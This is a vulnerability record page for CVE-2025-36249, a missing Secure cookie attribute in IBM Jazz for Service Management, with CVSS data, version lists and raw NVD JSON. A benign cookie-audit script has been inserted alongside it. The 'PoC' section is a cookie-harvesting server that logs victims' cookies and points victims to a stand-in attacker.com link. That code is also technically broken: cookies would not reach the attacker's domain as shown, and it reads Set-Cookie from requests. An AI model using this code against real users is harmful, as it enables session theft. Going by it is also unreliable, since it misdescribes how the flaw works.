Security Vulnerability Report
CVE-2025-36249 CVSS 3.7 LOW

CVE-2025-36249

Published: 2025-10-31 13:15:34
Last Modified: 2025-11-05 19:47:32

Description

IBM Jazz for Service Management 1.1.3.0 through 1.1.3.25 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic.
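A defender-side check for the condition described above, as an added example that is not part of the original record or of IBM's code: it parses `Set-Cookie` response header values and lists the cookies issued without the Secure attribute. The cookie names and header values are constructed samples, and the function names are hypothetical.

```python
# Added example: audit Set-Cookie header values for a missing Secure attribute (CWE-614).
from typing import Dict, List


def parse_set_cookie(header_value: str) -> Dict[str, object]:
    """Split one Set-Cookie header value into cookie name, value and attributes."""
    parts = [p.strip() for p in header_value.split(";")]
    # The first segment is always name=value; everything after it is an attribute.
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        # Attribute names are case-insensitive, so normalise them to lower case.
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value, "attrs": attrs}


def cookies_missing_secure(set_cookie_headers: List[str]) -> List[str]:
    """Return the names of cookies a browser would also send over http://."""
    findings = []
    for raw in set_cookie_headers:
        cookie = parse_set_cookie(raw)
        if "secure" not in cookie["attrs"]:
            findings.append(cookie["name"])
    return findings


# Constructed sample headers (not captured from any real product).
SAMPLE_HEADERS = [
    "session_id=0000abc123; Path=/; HttpOnly",        # Secure missing
    "auth_token=Zm9vYmFy; Path=/; Secure; HttpOnly",  # Secure present
    "pref=secure=off; Path=/",                        # "secure" only inside the value
    "csrf=77aa; path=/; SECURE; SameSite=Strict",     # attribute in upper case
]

if __name__ == "__main__":
    for cookie_name in cookies_missing_secure(SAMPLE_HEADERS):
        print(f"cookie {cookie_name!r} is set without the Secure attribute")
```

A plain substring search for "secure" would miss the third sample, which is why the check parses attributes separately from the cookie value.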

CVSS Details

CVSS Score: 3.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:jazz_for_service_management:*:*:*:*:*:*:*:* - VULNERABLE
IBM Jazz for Service Management 1.1.3.0
IBM Jazz for Service Management 1.1.3.1
IBM Jazz for Service Management 1.1.3.2
IBM Jazz for Service Management 1.1.3.3
IBM Jazz for Service Management 1.1.3.4
IBM Jazz for Service Management 1.1.3.5
IBM Jazz for Service Management 1.1.3.6
IBM Jazz for Service Management 1.1.3.7
IBM Jazz for Service Management 1.1.3.8
IBM Jazz for Service Management 1.1.3.9
IBM Jazz for Service Management 1.1.3.10
IBM Jazz for Service Management 1.1.3.11
IBM Jazz for Service Management 1.1.3.12
IBM Jazz for Service Management 1.1.3.13
IBM Jazz for Service Management 1.1.3.14
IBM Jazz for Service Management 1.1.3.15
IBM Jazz for Service Management 1.1.3.16
IBM Jazz for Service Management 1.1.3.17
IBM Jazz for Service Management 1.1.3.18
IBM Jazz for Service Management 1.1.3.19
IBM Jazz for Service Management 1.1.3.20
IBM Jazz for Service Management 1.1.3.21
IBM Jazz for Service Management 1.1.3.22
IBM Jazz for Service Management 1.1.3.23
IBM Jazz for Service Management 1.1.3.24
IBM Jazz for Service Management 1.1.3.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36249 PoC - Cookie Hijacking via HTTP
# This PoC demonstrates how an attacker can capture cookies when Secure attribute is missing
import http.server
import socketserver
import urllib.parse
import json
from datetime import datetime


class CookieSniffer(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        """Handle incoming HTTP requests and log cookies"""
        # Parse cookies from request headers
        cookies = self.headers.get('Cookie', '')
        cookies += ';' + self.headers.get('Set-Cookie', '')

        # Log captured information
        log_entry = {
            'timestamp': datetime.now().isoformat(),
            'source_ip': self.client_address[0],
            'path': self.path,
            'cookies': cookies,
            'user_agent': self.headers.get('User-Agent', 'Unknown')
        }
        print(f"[*] Captured request from {log_entry['source_ip']}")
        print(f"[*] Cookies: {cookies}")

        # Save to log file
        with open('captured_cookies.json', 'a') as f:
            f.write(json.dumps(log_entry) + '\n')

        # Send response to keep connection alive
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write(b'<html><body>Loading...</body></html>')


def generate_malicious_link(target_url):
    """Generate HTTP link to capture cookies"""
    # Convert HTTPS URL to HTTP for the attack
    attack_link = target_url.replace('https://', 'http://')
    return attack_link


def simulate_cookie_hijack(cookie_value):
    """Simulate session hijacking using captured cookie"""
    # This would be used to make authenticated requests
    headers = {
        'Cookie': cookie_value,
        'User-Agent': 'Mozilla/5.0 (compatible; SecurityScanner/1.0)'
    }
    return headers


if __name__ == '__main__':
    PORT = 8080
    print(f"[*] Starting Cookie Sniffer on port {PORT}")
    print(f"[*] Send this link to victim: http://attacker.com:8080/malicious")
    with socketserver.TCPServer(("", PORT), CookieSniffer) as httpd:
        httpd.serve_forever()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36249", "sourceIdentifier": "[email protected]", "published": "2025-10-31T13:15:33.823", "lastModified": "2025-11-05T19:47:32.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Jazz for Service Management 1.1.3.0 through 1.1.3.25 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-614"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_for_service_management:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.3.0", "versionEndExcluding": "1.1.3.26", "matchCriteriaId": 
"61537CC7-D26B-4A1A-8F9E-4B3917D4015A"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7249820", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}